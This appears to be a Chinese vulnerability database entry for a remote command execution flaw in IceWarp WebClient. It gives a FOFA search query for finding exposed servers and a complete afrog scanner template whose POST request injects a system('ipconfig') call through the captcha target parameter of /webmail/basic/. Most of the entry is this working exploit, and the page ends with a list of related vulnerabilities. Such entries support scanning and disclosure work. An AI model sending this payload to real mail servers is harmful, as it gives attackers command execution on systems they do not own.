icewarp-webclient-basic-rce: IceWarp WebClient basic 远程命令执行漏洞

日期: 2025-09-01 | 影响软件: IceWarp WebClient | POC: 已公开

漏洞描述

IceWarp WebClient 存在远程命令执行漏洞，攻击者构造特殊的请求即可远程命令执行 fofa-query: app="IceWarp-公司产品"

PoC代码[已公开]

id: icewarp-webclient-basic-rce 

info:
  name: IceWarp WebClient basic 远程命令执行漏洞
  author: daffainfo
  severity: critical
  verified: true
  description: |
    IceWarp WebClient 存在远程命令执行漏洞，攻击者构造特殊的请求即可远程命令执行
    fofa-query: app="IceWarp-公司产品"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/IceWarp%20WebClient%20basic%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
    

rules:
  r0:
    request:
      method: POST
      path: /webmail/basic/
      headers:
        Cookie: use_cookies=1
      body: |
        _dlg[captcha][target]=system(\'ipconfig\')\
    expression: response.status == 302  && response.body.bcontains(b'Windows IP')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/icewarp-webclient-basic-rce.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

IceWarp WebClient basic 远程命令执行漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

IceWarp WebClient basic 远程命令执行漏洞无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC